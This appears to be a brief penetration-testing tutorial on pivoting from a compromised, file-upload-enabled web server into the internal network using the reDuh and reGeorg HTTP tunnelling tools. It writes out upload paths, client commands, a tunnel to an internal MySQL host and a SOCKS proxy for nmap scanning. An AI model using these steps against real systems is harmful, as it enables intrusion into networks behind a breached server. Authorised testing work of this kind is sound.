How to do pivot to internal network using web server where a file could be uploaded
During penetration test you have successfully compromise web server and able to upload files or shell, with reDuh you can connect to internal network behind web server with some simple steps.
With reDuh you can create a tunnel to forward TCP over HTTP requests. What steps need to do:
1) Download reDuh: https://github.com/sensepost/reDuh
2) Upload reDuh server part PHP/ASP/JSP to the web server, for example url: http://web.example.com/uploads/reDuh.php
3) Attacker runs reDuhClient on his machine: java -jar reDuhClient.jar http://web.example.com/uploads/reDuh.php
4) Attacker administer reDuh server via tcp port 1010 and can create port forward:
4a) connects to reDuh and creates a simple tunnel: [createTunnel]SOMEPORT:TARGETSERVER:SERVERPORT, example to known internal MySQL server: [createTunnel]:33306:mysql.example.loc:3306
4b) now attacker can connect to internal mysql server by address localhost:33306
Now tcp packets transmited over this tunnel are wrapped in HTTP requests.
reDuh supports multiple connections, so you can add more tunnels.
In 2014 developers created a reGeorg, a successor to reDuh.
reGeorg provides TCP tunneling over HTTP and bolts an a SOCKS4/5 proxy on top of it, so, reGeorg now is a fully-functional SOCKS proxy and gives ability to analyze target internal network.
reGeorg requires python 2.7 and module urllib3.
Simple steps to use it:
1) Upload tunnel aspx/ashx/jsp/php to the web server
2) Configure reGeorg by running: python reGeorgSocksProxy.py -p 1337 -u http://web.example.com/uploads/tunnel.php
3) Update your /etc/proxychain.conf to use this port and, for example, start nmap and scan ports.
You can download reGeorg by this link: https://github.com/sensepost/reGeorg
Pivot and pwn.
P.S.: bypassing restrictions to uploaded files isnt described here